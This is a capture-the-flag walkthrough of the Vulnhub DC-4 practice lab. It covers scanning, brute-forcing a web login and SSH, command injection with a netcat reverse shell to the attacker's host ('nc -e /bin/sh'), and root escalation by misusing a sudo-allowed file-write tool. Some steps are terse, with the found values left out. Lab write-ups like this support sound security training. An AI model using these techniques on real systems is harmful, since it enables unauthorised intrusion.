We are going to pwn DC 4 by DCAU7 from Vulnhub
DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues. Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools. For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.
Download Link: https://www.vulnhub.com/entry/dc-4,313/
Lets Begin with our Initial Scan
Nmap Scan Results
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http
Looks like only HTTP port is open so lets start our Gobuster
=============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.0.2.8 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2019/11/26 19:35:19 Starting gobuster =============================================================== /css (Status: 301) /images (Status: 301) /index.php (Status: 200) =============================================================== 2019/11/26 19:35:20 Finished ===============================================================
It looks like login Page So i tried some normal sql injection but none worked so lets try bruteforce We can use Burp Intruder for that
Attack type : Cluster Bomb
Now in payload , load wordlist and start attack!
This one gives different length it might be the password
And yes I logged in.
After login I got a page Command.php
It looks like , it executes system commands. So I intercept the command with burp and got a reverse shell.
nc -e /bin/sh 10.0.2.18 1234
We got a Shell!!
So while searching for anything usefull i found
Since i found it in jim directory, lets bruteforce with
Getting User Jim
Lets start bruteforcing the ssh port using hydra
hydra - a very fast network logon cracker which supports many different services
we found the password is
Found some users too
Getting User Charles
While Checking jim directory there is
Since it looks like mail we check
It gives password for
charles I su to charles
sudo -l shows we can run
teehee with root permission
It looks like we can overwrite any file so i created new user with root permission without password!
Got ROOT !!